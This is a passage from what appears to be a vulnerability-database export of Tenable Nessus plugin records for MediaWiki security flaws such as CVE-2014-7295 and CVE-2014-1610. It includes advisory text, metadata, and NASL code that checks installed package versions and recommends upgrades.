A remote attacker may be able to execute arbitrary code with the\n privileges of the process, create a Denial of Service condition, obtain\n sensitive information, bypass security restrictions, and inject arbitrary\n web script or HTML.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-June/000155.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ef35312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201502-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MediaWiki 1.23 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.23.8'\n All MediaWiki 1.22 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.22.15'\n All MediaWiki 1.19 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.19.23'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/mediawiki\", unaffected:make_list(\"ge 1.23.8\", \"rge 1.22.15\", \"rge 1.19.23\"), vulnerable:make_list(\"lt 1.23.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MediaWiki\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:06", "description": "*CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove separation of\ncss and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-10-09T00:00:00", "title": "Fedora 21 : mediawiki-1.23.5-1.fc21 (2014-12155)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-09T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-12155.NASL", "href": "https://www.tenable.com/plugins/nessus/78103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12155.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78103);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n script_xref(name:\"FEDORA\", value:\"2014-12155\");\n\n script_name(english:\"Fedora 21 : mediawiki-1.23.5-1.fc21 (2014-12155)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"*CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove separation of\ncss and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148675\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140214.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c135957\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"mediawiki-1.23.5-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:12:06", "description": " - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-10-14T00:00:00", "title": "Fedora 20 : mediawiki-1.23.5-1.fc20 (2014-12263)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-14T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-12263.NASL", "href": "https://www.tenable.com/plugins/nessus/78402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12263.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78402);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n script_xref(name:\"FEDORA\", value:\"2014-12263\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.23.5-1.fc20 (2014-12263)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148675\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0608efb0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.23.5-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:12:06", "description": " - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-10-14T00:00:00", "title": "Fedora 19 : mediawiki-1.23.5-1.fc19 (2014-12262)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-14T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-12262.NASL", "href": "https://www.tenable.com/plugins/nessus/78401", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12262.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78401);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n script_xref(name:\"FEDORA\", value:\"2014-12262\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.23.5-1.fc19 (2014-12262)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148675\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140819.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?264cc2ab\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.23.5-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T09:48:46", "description": "It was reported that MediaWiki, a website engine for collaborative\nwork, allowed to load user-created CSS on pages where user-created\nJavaScript is not allowed. A wiki user could be tricked into\nperforming actions by manipulating the interface from CSS, or\nJavaScript code being executed from CSS, on security-wise sensitive\npages like Special:Preferences and Special:UserLogin. This update\nremoves the separation of CSS and JavaScript module allowance.", "edition": 14, "published": "2014-10-06T00:00:00", "title": "Debian DSA-3046-1 : mediawiki - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:mediawiki"], "id": "DEBIAN_DSA-3046.NASL", "href": "https://www.tenable.com/plugins/nessus/78047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3046. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78047);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_xref(name:\"DSA\", value:\"3046\");\n\n script_name(english:\"Debian DSA-3046-1 : mediawiki - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was reported that MediaWiki, a website engine for collaborative\nwork, allowed to load user-created CSS on pages where user-created\nJavaScript is not allowed. A wiki user could be tricked into\nperforming actions by manipulating the interface from CSS, or\nJavaScript code being executed from CSS, on security-wise sensitive\npages like Special:Preferences and Special:UserLogin. This update\nremoves the separation of CSS and JavaScript module allowance.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mediawiki\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3046\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mediawiki packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.19.20+dfsg-0+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.20+dfsg-0+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:07:05", "description": "According to its version number, the MediaWiki application running on\nthe remote host is affected by an input validation error in the\n'includes/OutputPage.php' script related to JavaScript in CSS content.\nThis can be exploited to conduct cross-site scripting (XSS) attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 27, "published": "2014-10-09T00:00:00", "title": "MediaWiki < 1.19.20 / 1.22.12 / 1.23.5 'includes/OutputPage.php' XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-09T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_23_5.NASL", "href": "https://www.tenable.com/plugins/nessus/78109", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78109);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n\n script_name(english:\"MediaWiki < 1.19.20 / 1.22.12 / 1.23.5 'includes/OutputPage.php' XSS\");\n script_summary(english:\"Checks the MediaWiki version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the MediaWiki application running on\nthe remote host is affected by an input validation error in the\n'includes/OutputPage.php' script related to JavaScript in CSS content.\nThis can be exploited to conduct cross-site scripting (XSS) attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-October/000163.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?30a52eab\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.20\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.12\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.23#MediaWiki_1.23.5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T72672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2014/q4/67\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.20 / 1.22.12 / 1.23.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7295\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.(\\d|1[0-9])([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.(\\d|1[01])([^0-9]|$)\" ||\n version =~ \"^1\\.23\\.[0-4]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.20 / 1.22.12 / 1.23.5' +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:12:29", "description": " - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "published": "2014-02-07T00:00:00", "title": "Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-07T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-1802.NASL", "href": "https://www.tenable.com/plugins/nessus/72379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-1802.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"FEDORA\", value:\"2014-1802\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n 